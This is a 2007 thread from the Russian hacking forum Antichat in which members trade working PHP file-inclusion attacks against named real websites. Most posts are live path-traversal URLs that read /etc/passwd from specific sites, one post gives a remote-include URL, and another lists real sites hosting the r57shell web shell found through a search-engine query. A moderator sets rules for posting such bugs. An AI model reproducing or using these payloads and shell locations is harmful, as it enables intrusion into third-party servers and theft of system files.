ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

PHP Иньекции
  #1  
Старый 20.04.2007, 18:15
Аватар для Joker-jar
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
Exclamation PHP Иньекции

XSS, SQL inj нашел, а вот инклудинга в упор не вижу...
Код:
http://www.rupivo.ru/papers.php?file=../../../../../../etc/passwd
http://quake.olympus.ru/q3/playerstat.php?config=../../../../../../../etc/passwd
 
Ответить с цитированием

  #2  
Старый 20.04.2007, 19:33
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

Проведем тест прекрепляю тему на неделю если будет такая же активность как sql Иньекции оставляю.

+Постим только:
+php/perl/jsp иньекции.
+Исполнение произвольного кода.
+Исполнение произвольных команд.

+Статья php injection(
http://forum.antichat.ru/thread12123.html).

+За флуд буду строго наказывать.
+Не забываем про Post метод, если пользоваться Post методом то баги буду дольше жить. Подробности тут(http://forum.antichat.ru/thread24973.html).

При удаленных инклудах
Постим так:
Цитата:
http://site.com/index.php?page=[url]

Последний раз редактировалось [ cash ]; 23.04.2007 в 17:48..
 
Ответить с цитированием

  #3  
Старый 21.04.2007, 04:04
Аватар для VampiRUS
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию

Цитата:
http://www.giga-hamburg.de/index.php?file=../../../../../../../../../../../../../etc/passwd&folder=giga
запостю, только чёт я не уверен что будет такая же активность.
 
Ответить с цитированием

  #4  
Старый 21.04.2007, 10:55
Аватар для InferNo23
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213

Репутация: 378
По умолчанию

Код:
http://primotechnology.com/index.php?art=../../../../../etc/passwd
уже 210 просомтоов топика..
 
Ответить с цитированием

  #5  
Старый 21.04.2007, 11:57
Аватар для NOmeR1
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

Порадовало
Цитата:
http://www.jff.org/download.php?file=../../../../../../etc/passwd - сохраняем и открываем
 
Ответить с цитированием

  #6  
Старый 21.04.2007, 11:59
Аватар для NOmeR1
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

Цитата:
http://www.berlinpolis.de/download.php?file=../../../../../../etc/passwd
- сохраняем как passwd.txt и открываем
 
Ответить с цитированием

  #7  
Старый 21.04.2007, 12:01
Аватар для s1mt
s1mt
Новичок
Регистрация: 18.04.2007
Сообщений: 15
Провел на форуме:
107912

Репутация: 22
По умолчанию

http://www.huntington.laurentian.ca/index.php?file=../../../../../etc/passwd
 
Ответить с цитированием

  #8  
Старый 21.04.2007, 12:52
Аватар для V1k
V1k
Познающий
Регистрация: 01.02.2007
Сообщений: 41
Провел на форуме:
1718137

Репутация: 201
По умолчанию

Удаленный инклуд:

Код:
http://www.casadelajuventud.mrg.gov.ar/principal.php?url=h://ttp://::////forum.antichat.ru/antichat/pic/logo.gif?
Немного оффтоп, стало сейчас интересно, всё ли еще можно что-то найти в гугле по запросу "r57shell - http-shell by RST/GHC":

Код:
http://www.aodaitimhue.com/nhacrock/info.php
http://www.shp-berlin.de/en/expertise.php
http://www.auschwitzdanceparty.org/conf/r57.php
http://live8x.com/images/kol.php
http://www.securitysafetysystems.com/includes/mysqlconfig.local.php
http://www.huyhoangkontum.org/h.php
http://www.sniperfoxselacome.com/index.php
http://www.hostingstar.us/rapid/ab.php
http://www.aongtr.ro/g.php
http://wwwreal-estate.com/rel-estate-info/wp-commentsrs.php
 
Ответить с цитированием

  #9  
Старый 21.04.2007, 13:08
Аватар для zl0ba
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

Цитата:
http://www.webcreativestudio.com/?id=inter&param=doc_php&lang=2&doc_dop_param=../../../../../../../../etc/passwd
И просматриваем в исходном тексте =)
 
Ответить с цитированием

  #10  
Старый 21.04.2007, 13:09
Аватар для NOmeR1
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

Цитата:
http://en.brazilny.org/force-download.php?file=../../../../../../etc/passwd
- сохраняем как passwd.txt и открываем
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
Books PSalm69 Избранное 248 27.10.2009 04:52
На PHP, как на "Новые ворота"... Mertvii-Listopad Чужие Статьи 7 18.09.2006 12:42
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ